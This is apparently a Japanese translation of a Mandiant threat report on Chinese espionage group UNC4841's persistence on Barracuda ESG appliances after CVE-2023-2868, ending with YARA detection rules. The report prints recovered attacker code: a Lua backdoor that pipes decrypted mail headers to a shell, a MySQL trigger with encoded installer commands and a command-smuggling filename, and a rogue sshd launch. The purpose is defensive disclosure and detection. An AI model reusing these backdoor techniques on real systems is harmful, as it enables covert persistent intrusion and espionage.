Barracuda ESGのゼロデイ修復（CVE-2023-2868）後のUNC4841の活動についてのさらなる考察

※この投稿は米国時間 2023 年 8 月 29 日に、Google Cloud blog に投稿されたものの抄訳です。

2023年6月15日、Mandiantは、UNC4841として追跡されている中国系脅威グループによって8ヶ月間にわたって行われたグローバル・スパイ・キャンペーンについて詳述したブログ記事を発表しました。この続報となるブログでは、Mandiantのインシデント対応業務、およびBarracuda Networks社や弊社の国際政府パートナーとの共同作業を通じて明らかになった、UNC4841が採用した追加の戦術、テクニック、および手順（TTP）について詳しく説明します。

このブログでは、Mandiantが、UNC4841が修復の取り組みに対して洗練性と適応性を示し続けていることを詳しく説明します。具体的には、UNC4841は、パッチがリリースされる前、またはBarracudaの修復ガイダンスの直後に侵害した優先度の高い少数の標的組織において存在を維持できるように設計された新しく斬新なマルウェアを展開しました。また、UNC4841がバックドアを選択して実装していることから、この攻撃者は、活動が妨害された場合にも、優先度の高いターゲットへの侵害状態を維持するためのツールを事前に作成しており、修復作業を予測し、準備していたことがわかります。

さらに、Mandiantは、キャンペーン全体のタイムラインに関する追加的な洞察を提供するだけでなく、本ゼロデイ脆弱性の影響を受けたエンドカスタマーの調査を通じて観察されたUNC4841のターゲティングに関するより深い考察を提供します。これは、UNC4841と中華人民共和国のつながりを一層裏付けています。

2023年5月20日、BarracudaがESGアプライアンスのパッチをリリースして以来、MandiantとBarracudaは、攻撃者によるCVE-2023-2868の悪用が成功して侵害された物理、または仮想ESGアプライアンスの新たな証拠を確認していません。侵害されたESGアプライアンスは全世界で非常に限定的な台数（ESGアプライアンスの5%）であり、影響を受けた顧客はアプライアンスを交換するように通知されています。BarracudaのSaaSメールソリューションなど、他のバラクーダ製品はこの脆弱性の影響を受けていません。

MandiantとBarracudaは一方、以前に侵害されたアプライアンスに関する調査を実施し、UNC4841がデバイスのサブセットに追加のマルウェアを展開し、追加のエクスプロイト活動を実施したことを確認しました。

Mandiantは、本ブログ執筆時点で、このキャンペーンにより以前に影響を受けた限られた数の被害組織が依然として危険にさらされていると評価しています。UNC4841は、優先度の高い一部の被害組織に関心を示しており、これらの被害組織のアプライアンス上で、バックドアDEPTHCHARGEなどの追加のマルウェアが展開され、修復作業に対する持続性を維持しています。MandiantとBarracudaは、このような活動が確認された個々の被害組織に連絡を取っています。このキャンペーンの影響を受けた被害組織は、Barracudaのサポートに連絡し、侵害されたアプライアンスを交換してください。

キャンペーン・タイムライン

最初のブログ投稿以来、Mandiant は、CVE-2023-2868 の悪用に成功した被害組織で観測されたすべての特定された UNC4841 アクティビティに関する網羅的なタイムラインを作成し、分析してきました。図 1 に示すように、このキャンペーンは 2022 年 10 月から 2023 年 6 月にかけて行われ、CVE-2023-2868 の悪用活動が急増したのは 2022 年 11 月初旬でした。

Mandiantでは、キャンペーンの分析を通じて、2023年1月20日から1月22日にかけてアクティビティが明らかに減少していることを確認しました。この期間は、中華人民共和国で祝日に制定されている旧正月の始まりと一致しています。タイムラインをさらに分析した結果、Barracudaによる最初の修復作業と2023年5月23日の情報公開・通知の後に、2回の活動の急増が確認されました。最初の急増は、通知直後の数日間に発生し、前回のブログで詳述したように、マルウェアを再構築し、永続化手法を変更しました。続いて、2023年6月初旬から、これまで公表されていなかった第二の波が発生しました。この第二の波において、Mandiantは、新たなマルウェア・ファミリーであるSKIPJACK、DEPTHCHARGE、FOXTROT / FOXGLOVEを展開することで、侵害された環境へのアクセスを維持しようとする攻撃者を発見しました。この第2波は、キャンペーン全体を通じてMandiantが確認したUNC4841の活動の中で最も高い勢いを示しており、特定の被害環境へのアクセスを維持するUNC4841の決意を示しています。

標的に応じたツール選定

UNC4841は、グローバルなスパイ活動を可能にするために、さまざまなマルウェアや専用ツールを駆使しています。調査が進むにつれて明らかになったテーマの1つは、優先順位の高いターゲットに対して特定のマルウェア・ファミリーを選択的に展開することです。私たちが選択的に展開されていることを確認した3つのコードファミリーは、SKIPJACK、DEPTHCHARGE、FOXTROT / FOXGLOVEです。これらのマルウェア・ファミリーはそれぞれ、展開における選択性のレベルが高くなっています

SKIPJACK

SKIPJACKは、悪意のあるLuaコードを注入することで正規のBarracuda ESGモジュールをトロイの木馬化することで実装されるパッシブバックドアです。埋め込まれたコードを通じて、SKIPJACKは特定の受信メールヘッダと件名のリスナーを登録し、それらのコンテンツをデコードして実行することで、バックドア機能を確立します。Mandiantは、Content-IDおよびX-Barracuda-Spam-Infoメールヘッダフィールドの両方を利用するSKIPJACKのバリエーションを確認しています。

if hdr:name() == "Content-ID" then
        if hdr:body() ~= nil then
                if string.match(hdr:body(), "^[%w%+/=\r\n]+$") then
                        io.popen("echo " " .. hdr:body() .. "" | openssl aes-256-cbc -d -A -a -nosalt -K <REDACTED> -iv <REDACTED> 2>/dev/null | base64 -d | sh 2>/dev/null"):close()
                End
        end
end

コードスニペットで観察されるように、注入されたSKIPJACKコードは、Content-IDヘッダーが存在するかどうか、そしてそれがBase64エンコードされた文字列に存在する文字を 含んでいるかどうかを検査します。この条件が満たされると、AES-256の復号化とヘッダーボディのBase64デコードを行い、出力をシステムシェルにパイプし実行させます

CVE-2023-2868に関するBarracudaの最初の通知が行われた頃、MandiantはUNC4841が以前に侵害されたアプライアンス上で`/boot/os_tools/`というパスに`mknod`というファイル名でbashスクリプトを作成することを確認しました。mknod`のbashスクリプトは、侵害されたアプライアンス上の`mod_content.lua`スクリプトに文字列`OpenSSL`が含まれているかどうかをチェックし、見つからない場合は、上記のコードスニペットをmod_content.luaスクリプトに注入し、正規のバラクーダESGモジュールを効果的にバックドアします。

これら3つのマルウェア・ファミリーのうち、UNC4841はSKIPJACKを最も広く展開しており、侵害されたESGアプライアンス全体の約5.8%で確認されています。UNC4841は、SKIPJACKで主に政府機関や技術系組織を標的にしていましたが、その他の業種も標的になっていることが確認されています。

さらに、今回のキャンペーンで UNC4841 が展開したすべてのマルウェア・ファミリーの中で、SKIPJACK の亜種が最も多いことが Mandiant の調査で判明しました。私たちは、侵害されたアプライアンス上に多くの異なるSKIPJACK bashスクリプトが存在する証拠を確認しましたが、このマルウェアのすべてのインスタンスを復元することはできませんでした。私たちが入手したサンプルに基づくと、これらの未回収の亜種にはそれぞれ異なるSKIPJACKコードが含まれており、電子メールメッセージ内の異なるセクションを利用して暗号化されたコマンドを隠し、同じ機能を実現しているものと思われます

DEPTHCHARGE

MandiantがUNC4841によって選択的に展開されていることを確認したもう1つのマルウェア・ファミリーは、DEPTHCHARGEと名付けたパッシブバックドアです。DEPTHCHARGEはCISAでSUBMARINEとして追跡されており、Linux共有オブジェクトライブラリとしてパッケージ化され、LD_PRELOADを使用してBarracuda SMTP（BSMTP）デーモンにプリロードされます。DEPTHCHARGEは暗号化されたコマンドを受信するために受動的にリッスンし、OpenSSLで復号化し、SMTPコマンドとして偽装された結果をコマンド＆コントロール（C2）サーバーに送信する前に実行します。DEPTHCHARGEは複雑な実行チェーンを通じてインストールされ、永続化されます。この実行チェーンは、被害者が以前に侵害されたデバイスからバックアップ・コンフィギュレーションをリストアしたときに、再発行されたアプライアンスまたはクリーンなアプライアンスに感染できるように、行為者が細工したものです。図4は、DEPTHCHARGEの実行チェーンを示したものです。

DEPTHCHARGEの実行チェーンの最初のステージは、バラクーダESGアプライアンスの設定を保存するMySQLデータベースに悪意のあるトリガー（`cuda`または`cuda_trigger`という名前）を定義する`config.TRG`という名前のファイルに存在します。

TYPE=TRIGGERS
triggers='CREATE TRIGGER cuda\nBEFORE DELETE ON config\nFOR EACH ROW\nBEGIN\n    DECLARE i INT;\n    SET i = 1;\n    IF i = 1 THEN\n        SELECT "<base64_payload>” INTO OUTFILE "/var/tmp/r";\n        SELECT "echo
-n Y2F0IC92YXIvdG1wL3IgfCBiYXNlNjQgLWQgLWkgfCB0YXIgLXp4IC1DIC92YXIvdG1wCm5va
HVwIGJhc2ggL3Zhci90bXAvcnVuLnNoICAgMzExNTMgICAgPi9kZXYvbnVsbCAyPiYxICYKcm0gLWYgL3Jvb3QvbWFjaGluZVxgKg== | base64 -d | sh" INTO OUTFILE "/root/machine`echo -n Y2htb2QgK3ggL3Jvb3QvbWFjKlxgKgpzaCAvcm9vdC9tYWMqXGAq | base64 -d |sh`|";\n        SET i = i + 1;\n    END IF;\nEND'
sql_modes=0
definers='root@localhost'

cat /var/tmp/r | base64 -d -i | tar -zx -C /var/tmp
nohup bash /var/tmp/run.sh   31153    >/dev/null 2>&1 &
rm -f /root/machine\`*

このトリガーは、設定データベースから行が削除される前に実行されます。このアクションは頻繁に発生し、以前のBarracuda ESG設定のリストア時に実行されます。インストーラシェルスクリプトと最終的なDEPTHCHARGEバックドアペイロードを含むTARアーカイブです。トリガーの残りのコンポーネントは、このアーカイブを解凍するスクリプトをディスクに書き込み、中のインストーラスクリプトを実行し、ディスク上のファイルを削除します。しかし、MySQL トリガから直接スクリプトを実行することはできません。そのため、UNC4841は、インストーラスクリプトを実行するために、Perlのopen( )関数の2つの引数形式を使用するBarracuda ESGのコードベースの他のコンポーネントがコマンドを実行するように、ファイル名を特別に細工しました（バックスティックの内部を示す）。最終的に、この斬新なアプローチにより、UNC4841はMySQLトリガーからコマンドを実行し、DEPTHCHARGEスクリプトを起動することができました。UNC4841がこの複雑な実行パスを特定し、運用したという事実は、彼らがデバイスに関する広範な知識を持っており、Barracuda ESGアプライアンスの内部コンポーネントを調査していたことを示唆しています。

インストーラスクリプト`run.sh`は、DEPTHCHARGE `BSMTP_ID`構成値（後述）を指定する引数とともに実行されます。 このスクリプトは、アプライアンス上の正当なディレクトリにDEPTHCHARGEペイロードを移動し、BSMTPデーモンの実行時に指定されたBSMTP_ID構成値でマルウェアをプリロードするようにSMTP構成ファイルを修正します。また、実行前に2分間スリープし、プリロードのパーシステンスが存在するかどうかをチェックし、見つからない場合はSMTPコンフィギュレーションファイルにインストールする追加スクリプトも作成します。さらに正当なアクティビティに紛れ込むために、スクリプトのいくつかの亜種は、`touch`コマンドを使用してシステム上の正当なファイルからタイムスタンプを継承することで、マルウェアのファイルをタイムストンプすることも判明しました。

DEPTHCHARGEバックドアは着信TCP接続を受け付けることができます。クライアントのTCPソースポートが`BSMTP_ID`環境変数の値と等しいかどうかをチェックし、等しければLinuxデーモンとしてバックドア機能を実行します。DEPTHCHARGEはまずアプライアンスのSMTPポート（127.0.0.1:25）に接続してアプライアンスの本物のSMTPバナーを取得し、攻撃者に送り返す。これはSMTPグリーティングメッセージとして、また接続先のアプライアンスの身元を確認するために使用される可能性が高いです。

このマルウェアは、SMTP EHLOコマンドを装った暗号化されたコマンドを受信することができます。このコマンドは、"ehlo "という文字列の前にスペースが続きます。暗号化されたコマンドは、実行される前にBase64デコードされ、OpenSSLでAES復号化されます。マルウェアは結果を攻撃者に送り返し、再びSMTPトラフィックとして偽装します：

250-mail2.eccentric.duck Hello <command body> [<client's IP address string>], pleased to meet you
250-SIZE 100000000
250-PIPELINING
250-8BITMIME
250 HELP

SMTP EHLOコマンドに応答してDEPTHCHARGEが送信するSMTPリプライには、"mail2.eccentric.duck "というローカルホスト名が含まれます。このホスト名はハードコードされた文字列であり、公開登録ドメイン名とは関係ありません。

影響を受けた被害組織は、侵害されたアプライアンスから構成をエクスポートし、クリーンなアプライアンスにリストアできるようにするのが一般的でした。そのため、エクスポートされた設定にDEPTHCHARGEトリガが存在する場合、UNC4841はこの実行チェーンを通じてクリーンデバイスにDEPTHCHARGEバックドアを感染させ、アプライアンスを完全に交換した後でもアクセスを維持できる可能性があります。MandiantとBarracuda Networksは、これが発生する可能性のある事例を特定し、被害組織に適宜通知しました。さらに、Mandiantは、このMySQL設定データベースにユーザ・アカウントの平文パスワードが含まれている場合があることを認識しています。このような場合、攻撃者はこれらの認証情報を水平展開の目的で取得していたと思われます。

UNC4841がDEPTHCHARGEを展開した最も古い証拠は、Barracudaの最初の通知から約1週間後の2023年5月30日に発生しました。Mandiantは、UNC4841が、RMAが推奨される対応アクションであるとBarracudaが発表した後、選択したターゲットにDEPTHCHARGEを迅速に展開したことを確認しました。この能力とその展開は、UNC4841が価値の高い標的組織内で持続できるように設計されたツールとTTPを使用して、修復作業を予測し、準備していたことを示唆しています。また、この作戦がグローバルに展開されていたにもかかわらず、日和見的なものではなかったこと、UNC4841が標的ネットワークへのアクセスを中断させる可能性のある不測の事態を予測し、それに備えるための十分な計画と資金を持っていたことを示唆しています。現在までの調査の過程で、Mandiantは、UNC4841が侵害されたアプライアンスのおよそ2.64パーセントにDEPTHCHARGEを展開していることを確認しました。これらの被害組織には、米国および他各国の政府機関、ハイテクおよび情報技術プロバイダが含まれています。

FOXTROT / FOXGLOVE

MandiantがUNC4841によって選択的に展開されていることを確認した最後のマルウェア・ファミリーは、FOXTROT / FOXGLOVEでした。FOXGLOVEはC言語で書かれたランチャーで、FOXTROTのハードコードされたパスを実行します。ペイロードは、C2、ポート、秘密鍵、ジッターの暗号化された追加引数とともに実行されます。FOXGLOVEはBase64、Mod(13)、ハードコードされたキーとのXORを組み合わせて引数を暗号化します。

FOXGLOVEは、実行パスや引数を簡単に変更できるように、設定可能なように実装されています。

/usr/share/foxdoor/foxdoor_shell shell -t <Encrypted C2> -p <Encrypted Port> -s <Encrypted 
Secret> -r <Jitter>

FOXTROTはC++で書かれたバックドアで、TCP経由で通信し、プロキシとして使用することができます。サポートされているバックドアコマンドには、キーストロークのキャプチャ、シェルコマンドの実行、リバースシェルの作成、ファイル転送などがあります。

FOXTROTはREPTILEシェルのオープンソースコードと重複しています。FOXTROTは特に、デフォルトのシーケンス`;7(Zu9YTsA7qQ#vw`を確認トークンとして使用し、セッションの終了を通知します。しかし、FOXTROTには、REPTILEにはないバックドアコマンドと機能も含まれています。

FOXTROTとFOXGLOVEは、バラクーダESG用に特別に設計されていないUNC4841で使用されている唯一のマルウェア・ファミリーであるという点でも注目に値します。機能性に基づいて、FOXTROTは、ネットワーク内の他のLinuxベースのデバイスに展開され、横方向の移動と認証情報の盗難を可能にすることも意図されていると考えられます。さらに、FOXGLOVEとFOXTROTは、UNC4841が使用したすべてのマルウェア・ファミリーの中で、最も選択的に展開されました。現時点では、MandiantはUNC4841がFOXTROTとFOXGLOVEを、PRCにとって優先順位の高いターゲットである政府機関や政府関連組織に展開するのを観測したのみです。

水平展開

BarracudaがCVE-2023-2868を公開した後、Mandiantは、UNC4841が限られた数の被害組織環境内で内部偵察とその後の水平展開アクションを実行していることを確認しました。

2023年5月16日、Mandiantは、UNC4841が、Mandiantが対応していた一部の被害組織の内部ネットワーク上で内部偵察を試みた最初の証拠を観測しました。これらのケースでは、攻撃者はfscanのようなオープンソースツールを利用して、ホスト検出、ポートスキャン、Webフィンガープリント識別、Web脆弱性スキャン、ドメイン制御識別、およびその他の偵察アクションを実行しました。ある環境では、行為者は9日間にわたって50以上のサブネットをスキャンし、そのうち約80%は1日で完了しました。次の図は、侵害されたESGアプライアンスから回収されたfscanツールの出力例です。

<redacted>::25 open
<redacted>:25 open
<redacted>:587 open
<redacted>:443 open
[*] NetInfo:
[*]<redacted>
   [->]<redacted>
   [->]<redacted>
[*] WebTitle: https://<redacted>       code:200 len:701    title:IIS Windows Server
<redacted>:25 open
<redacted>:443 open
[*] LiveTop <redacted>/16     段存活数量为: 65
[*] LiveTop <redacted>/16     段存活数量为: 26
[*] LiveTop <redacted>/16     段存活数量为: 13
<redacted>:25 open
<redacted>:587 open
<redacted>:53 open
<redacted>:389 open

偵察活動に加えて、Mandiant は、同じ期間内に影響を受けた ESG アプライアンスから水平方向に移動しようとする UNC4841 も観察しました。調査の過程で観察された活動から、Mandiant は、UNC4841 が ESG 上の一時的な保存場所である mstore 内に保存されたメッセージの内容を利用して認証情報を取得していた可能性が高いと見ています。複数の事例において、Mandiantは、ESGに保存されたメッセージの内容に含まれる平文の認証情報を特定しています。UNC4841はその後、最初の試行でOutlook Web Access（OWA）を通じてアカウントへのアクセスに成功するために使用しました。

複数のケースで、Mandiant は、UNC4841 が OWA を利用して被害組織内のユーザーのメールボックスへのログインを試みていることを確認しました。あるケースでは、OWA アクセスが失敗に終わり、ごく一部のアカウントがロックアウトされました。UNC4841が限られた数のアカウントへの不正アクセスを取得できたケースでは、MandiantはUNC4841が侵害されたアカウントから電子メールを送信するのを観測していません。Mandiantは、UNC4841がBarracudaの修復後にスパイ目的で情報を収集するために、侵害されたユーザーのメールボックスへのアクセスを維持しようとしていた可能性が高いと評価しています。

ActiveDirectoryやOWAへの水平移動の試みに加え、MandiantはUNC4841がSSH経由で被害組織ネットワーク上のVPN、プロキシサーバー、その他のエッジアプライアンスに横移動しようとする試みも観測しました。

Mandiantはまた、リモートアクセスの別の形態として、以前に影響を受けたアプライアンスのおよそ5%において、etc/passwdファイル内にUNC4841によって作成されたアカウントを確認しました。アカウント名は、ランダムに生成された4つの文字を含む一貫した形式でした。そして、感染したアプライアンスへのバックドア・アクセスを維持するもう1つの手段として、特定のハイ・ポートをリッスンするsshデーモン・プロセスを起動し、この新しく作成されたユーザー・アカウントからのログインを許可します。コマンドの例を以下に示します：

/usr/sbin/sshd -p 48645 -oAllowUsers=rfvN

あるケースでは、MandiantはUNC4841がESGアプライアンス上のmstore内で特定されたドメイン管理者アカウントを利用してWindows Server Update Services（WSUS）サーバーにアクセスすることに成功していることを確認しました。このWSUSへのアクセスは、Mandiantが他の中国系スパイ行為者として、WSUSサーバー上にマルウェアを展開し、政府機関からデータを盗むためにリモートコード実行のための偽の更新プログラムを注入することを確認していることから、注目に値します。

標的の選定

UNC4841が明らかになってから2ヶ月の間に、MandiantはUNC4841がESGアプライアンスを標的としていること、およびそれに続く攻撃活動における主要な標的の選択についても理解を深めてきました。全体として、Mandiantは、世界中の公共部門および民間部門にわたる多様な組織がUNC4841ツールの影響を受けているようであることを確認しています。悪用活動の大部分は米州に影響を及ぼしているように見えますが、これは部分的にBarracuda製品の顧客基盤を反映している可能性があります（図13）。

UNC4841の影響を受けている組織は、国、ハイテク・IT企業、地方自治体、電気通信事業者、製造業、大学など、さまざまな業種に及んでいます。具体的な業種は26業種に及び、その機能は多岐に渡ります（図14）。また、ターゲット・セグメントに含まれていた注目すべきその他の業種には、ヘルスケアおよびバイオテクノロジー、公衆衛生、航空宇宙および防衛、半導体が含まれます。

被害が確認された組織のほぼ3分の1が政府機関でした。Mandiantが以前に発表した文書に記載されているように、ASEAN外務省、台湾や香港の対外貿易事務所、学術研究機関の電子メールドメインとユーザーを標的としたシェルスクリプトが発見されました。さらに、この攻撃者は、この被害政府が他国とのハイレベルな外交会議に参加している間に、中国にとって政治的または戦略的に関心のある政府の従業員が所有する電子メールアカウントを検索しました。このことから、標的型攻撃は、地理的・経済的に価値の高い特定のユーザーに対して優先的に行われたと考えられます。 また、BarracudaがCVE-2023-2868にパッチを適用し、最初に公開した後に導入されたUNC4841ツールを調査した際にも、ハイテクおよび情報技術のターゲットと並んで、政府機関に明確な優先順位が設定されていることが確認されました。これらの要因は、このキャンペーンがスパイ活動を動機としていたという評価を裏付けています。

2023年5月23日のCVE-2023-2868および修復作業に関するBarracudaの発表後、2023年5月22日から、攻撃者によって新しいマルウェアが展開されました。 これらのマルウェア・ファミリーには、SKIPJACK、DEPTHCHARGE、FOXGLOVE、FOXTROT、およびSEASPY V2として追跡されているSEASPYの新バージョンが含まれていました。最初に観測された新しいペイロードは、2023年5月22日のSEASPY v2で、その後、2023年5月30日から6月初めにかけてDEPTHCHARGE、FOXGLOVE、FOXTROTが観測されました。興味深いことに、これらの修復後のマルウェア・ファミリーを受け取った組織は、政府（国家）、ハイテク、情報技術セクターに偏っていました。これは、従来のスパイ活動や、ITおよびマネージド・サービス・プロバイダーへのアクセスを維持することを優先する脅威の存在を示唆している可能性があります。

注目すべきは、北米で影響を受けたと確認された組織のうち、このキャンペーンで標的とされた多数の州、県、郡、部族、市、町の事務所が標的とされていたことです。これらの組織には、市役所、法執行機関、さまざまなレベルの司法機関、社会福祉事務所、いくつかの編入された町が含まれています。全体的な地方自治体の標的は、特定された影響を受ける組織全体の7％弱ですが、この統計は、米国を拠点とする標的だけで比較すると、17％近くに増加します。場合によっては、標的とされた団体の人口が1万人を下回ることもあありました。地方政府を標的とした攻撃は、CVE-2023-2868が悪用され始めた最初の数カ月に多く発生しており、観測された侵害の大部分は2022年10月から12月にかけて発生しています。その後、UNC4841のポスト修復ツールによって影響を受けた地方政府組織の数は、観測された影響を受けた組織のわずか8%にまで減少しています。この減少は、UNC4841の脅威活動が継続する間、運用上の優先順位が変化していることを表している可能性があります。

米国と欧州の地域情報技術プロバイダーは、SALTWATER、SEASPY、およびSEASIDEが配信された初期の悪用事例の中で、統計的に注目すべき量の標的を経験しました。これらのペイロードは、UNC4841による最初の侵害の一部として、感染したデバイス上で実行された目的に対するさらなるアクションを伴わずに配信されました。Mandiantは、キャンペーンの初期段階における敵の行動を完全に可視化しているわけではありません。しかし、インシデント対応中にいくつかの兆候が発見され、感染したデバイス上で悪意のある活動の痕跡を削除していることがわかりました。これら3つのマルウェア・ファミリーが単独で観測されたことから考えられる結論は、敵対者は、UNC4841に起因する後期段階のツールのさらなる侵害と展開のために、感染したアプライアンスをまだ優先順位付けしていないということです。あるいは、後続のツールや悪意のある活動の兆候は、修復作業を開始する前に行為者によって削除された可能性もあります。

2022年10月から2023年2月にかけて、初期ペイロードのみが配信され、影響を受けたITおよびMSPプロバイダーが急増したのは、UNC4841がこの種のBarracuda ESG環境で最初の足場を確立しようとしたためである可能性があります。これらの影響を受けたターゲットのうち、後段のペイロードを受信したもの、または特定のユーザーに関連するデータの流出を目的とした標的型コマンドに関連するものはほとんどありませんでした。Mandiantでは、ITプロバイダーが悪用の最終ターゲットではなく、Barracuda ESGサーバーで管理されるドメインへのアクセスを最大化するために、これらの組織がターゲットにされたことを示唆する可能性があると低信頼性で評価しています。Barracuda ESGでは、受信メールの添付ファイルをスキャンするために、多数のメールドメインを管理することができ、ITプロバイダーやマネージド・サービス・プロバイダーは、単一のエンタープライズサーバーと比較して、より多様なダウンストリームの顧客メールドメインを管理することができます。さらに、前述したように、ハイテクおよび情報技術プロバイダーは、UNC4841のポストレメディエーション・ツールによって2番目に標的とされたセクターでした。

特定された被害組織をさらに詳しく調べると、差し迫った戦略的国家期限に直面する中で、世界政府が競争力のある技術的・経済的優位性を維持する上で重要なセクターが繰り返し標的になっていることがわかりました。半導体、公衆衛生、航空宇宙、人工知能／自律走行車、レアアース（希土類金属）製造の各セクターに属する組織が確認されました。さらに、宗教団体もUNC4841キャンペーンの影響を受けました。中国（および香港や台湾のような中国が主張する地域）に影響を及ぼす、ミッションに基づく援助や福音主義的な使命を表明している組織の一群が、この攻撃者によって利用されたマルウェアの初期段階で標的にされていることが観察されました。伝統的なスパイ活動の要件に合致する多数の影響を受けた組織とは異なり、これらの組織は、SALTWATER、SEASPY、SEASIDEなどの初期段階のインプラントを受けただけでした。このことは、UNC4841 の収集要件の優先順位が低いことを示唆している可能性があり、より従来型の地政学的、防衛的、および技術的な要件に沿った組織では、より深い侵害、持続性、および流出の証拠が観察されています。

分析時点で入手可能な証拠によると、最も初期の侵害は、中国本土に所在する少数のアプライアンスで発生したようです。この初期の侵害行為で使用された C2 通信は、8080 ポートも利用していましたが、グローバルに発生した後期の侵害行為では、ほぼ完全に 443 ポートまたは 25 ポートが利用されていました。

アトリビューション

Mandiantは以前、UNC4841が中華人民共和国を支援するスパイ活動を行っていると高い信頼性を持って評価していました。私たちの評価は変わっておらず、現在では米国政府機関の独立した評価によって裏付けられています。最初のブログ記事で述べたように、私たちの調査を通じて、他の中国関連企業との重複がいくつか確認されています。しかし、Mandiantは、UNC4841として追跡された活動を、以前から把握している攻撃グループにはアトリビューションしていません。

中国のサイバー・エスピオナージ工作の動向

調査の初期段階で、私たちはUNC4841が使用するインフラが、少なくとも2019年以降に活動を観測し、東南アジア地域の組織を重点的に標的としているもう1つのチャイナネクサスアクターであるUNC2286と関連しているインフラと重複していることを確認しました。MandiantがUNC2286に起因するとした活動は、GhostEmperor（Kaspersky）およびFamousSparrow（ESET）に関する公開報告と重複しています。この発見は、両グループが使用するインフラストラクチャーに関連があることを示していますが、インフラストラクチャーの匿名化サービスまたはインフラストラクチャーのプロバイダーが両グループ間で共通であることが原因である可能性が高いです。

さらに、Mandiantは最近、FOXTROTと同様に、改変されたREPTILEのソースコードをベースとしたカスタムマルウェアを展開する、中国に関連するもう1つの巧妙なスパイ行為者、UNC3886を観測しています。最近のUNC3886のキャンペーンでは、Fortinetのアプライアンスに対するゼロデイエクスプロイトと、UNC3886のバックドアCASTLETAPを含むカスタムマルウェアのエコシステムが活用されました。CASTLETAPはSEASPYと同様の機能を実現し、バックドア機能を有効化するマジックパケットを受動的にリッスンし、SSL暗号化でC2サーバーに接続するように設計されています。UNC3886によって展開された他のマルウェア ファミリーも、UNC4841によって展開されたものと同様の特徴を示しています。たとえば、DRIEDMOATも同様のパッシブ型バックドアで、侵害されたアプライアンスから盗まれた証明書が埋め込まれており、UNC4841で確認された手法と同様に、C2通信を暗号化するために使用されることが確認されています。

匿名化のための共有インフラや技術は、ツールやマルウェア開発リソースの共有と同様に、中国のサイバースパイ攻撃者の間で一般的です。Mandiantは、これらの観察結果は、中国のサイバースパイ活動で観察されたさらなる高度化の証拠であり、検知を回避し、アトリビューションを複雑にするための、より意図的で、ステルス性のある、効果的な活動へと進化していると評価しています。今後も、ゼロデイ脆弱性や特定のアプライアンス・エコシステム向けにカスタマイズされたマルウェアの展開により、エッジインフラを標的とした中国のサイバースパイ活動が観察される可能性があります。

展望と影響

調査の過程で、UNC4841は防御的な取り組みに非常に敏感であることが証明されており、スパイ活動を継続するために被害組織の環境内でのアクセスを維持するためにTTPを積極的に変更しています。Mandiantでは、影響を受けたBarracudaのお客様に、侵害されたESGの影響を受けたネットワーク内のUNC4841の活動を引き続き調査することを強く推奨しています。UNC4841は、その洗練性が実証され、アクセスを維持したいという強い意思が証明されているため、ネットワーク防御者がこの敵対者に対して行動を継続し、その活動がセキュリティコミュニティによってさらに公開されるにつれて、TTPを変更し、ツールキットを修正し続けるとMandiantは予想しています。Mandiantは、UNC4841が今後もデバイスをエッジ化し続けると予測しています。UNC4841の活動を発見するために、IOCと検出ルールは以下のセクションで見つけることができます。

このキャンペーンの影響を受けた場合は、FBI（sf-barracudacve@fbi.gov）に連絡することをお勧めします。

謝 辞

米国サイバーセキュリティ・インフラストラクチャ安全保障局（CISA）の継続的なパートナーシップと本報告書への貢献に感謝するとともに、連邦捜査局（FBI）の継続的な協力と影響を受けた組織への通知への支援に感謝します。また、被害組織への通知に協力してくれたオーストラリア信号総局（ASD）のオーストラリア・サイバー・セキュリティ・センター（ACSC）にも感謝したいと思います。さらに、UNC4841によるCVE-2023-2868の悪用後のBarracuda Networksの毅然とした対応、透明性、パートナーシップに感謝します。

※本ブログは、8月29日に公開されたブログ「Diving Deep into UNC4841 Operations Following Barracuda ESG Zero-Day Remediation (CVE-2023-2868)」の日本語抄訳版です。

侵害指標 (IOCs)

Network IOCs

Domains

Host IOCs

検知ルール

YARA Rules

rule M_APT_Installer_SKIPJACK_1 {
meta:
  author = "Mandiant"
  md5 = "e4e86c273a2b67a605f5d4686783e0cc"
strings:
  $str1 = "hdr:name() == 'Content-ID'" base64
  $str2 = "hdr:body() ~= nil" base64
  $str3 = "string.match(hdr:body(),\"^[%w%+/=\\r\\n]+$\")" base64
  $str4 = "openssl aes-256-cbc" base64
  $str5 = "mod_content.lua" 
  $str6 = "#!/bin/sh" 
condition:
  all of them
}

SKIPJACK Installer

rule M_APT_Backdoor_SKIPJACK_1 {
meta:
  author = "Mandiant"
  md5 = "87847445f9524671022d70f2a812728f"
strings:
  $str1 = "hdr:name() == 'Content-ID'" 
  $str2 = "hdr:body() ~= nil" 
  $str3 = "string.match(hdr:body(),\"^[%w%+/=\\r\\n]+$\")" 
  $str4 = "openssl aes-256-cbc" 
  $str5 = "| base64 -d| sh 2>" 
condition:
  all of them
}

SKIPJACK Backdoor

rule M_APT_Backdoor_DEPTHCHARGE_1 {
meta:
  author = "Mandiant"
  md5 = "b745626b36b841ed03eddfb08e6bb061"
strings:
  $backdoor_command_main = { 65 63 68 6F 20 2D 6E 20 27 25 73 27 20 7C (20 62 61 73 65 36 34 20 2D 64 20 7C 20 | 20 ) 6F 70 65 6E 73 73 6C 20 61 65 73 2D 32 35 36 2D 63 62 63 20 2D 64 20 2D 4B 20 [24-124] 20 32 3e 2f 64 65 76 2f 6e 75 6c 6c 20 7c 20 73 68 } 
  $e1 = "welcomeflag" fullword
  $e2 = "welcomebuffer" fullword
  $e3 = "launch_backdoor" fullword
  $e4 = "backdoor_initalize" fullword
  $s1 = "BSMTP_ID" fullword
  $s2 = "result %d" fullword
  $s3 = "ehlo" fullword

condition:
  uint32(0)==0x464c457f and $backdoor_command_main and 4 of them
}

DEPTHCHARGE

rule M_APT_Launcher_FOXGLOVE_1 {
meta:
  author = "Mandiant"
  md5 = "c9ae8bfd08f57d955465f23a5f1c09a4"
strings:
  $str1 = { 48 ?? 66 6F 78 64 6F 6F 72 5F 48 89 ?? C7 ?? ?? 73 68 65 6C 66 C7 ?? ?? 6C 00 } 
  $str2 = { 48 ?? 2F 75 73 72 2F 73 68 61 48 ?? 72 65 2F 66 6F 78 64 6F 48 89 ?? 48 89 ?? ?? 48 ?? 6F 72 2F 66 6F 78 64 6F 48 ?? 6F 72 5F 73 68 65 6C 6C } 
  $str3 = "shell" 
  $str4 = "start.c" 
  $str5 = "base64en" 
  $str6 = "base64de" 
  $str7 = "-r" 
  $str8 = "-s" 
  $str9 = "-p" 
  $str10 = "-t" 
condition:
  uint32(0) == 0x464c457f and all of them
}

FOXGLOVE

rule M_APT_Backdoor_FOXTROT_1 {
meta:
  author = "Mandiant"
  md5 = "a28de396aa91b7faca35e861b634c502"
strings:
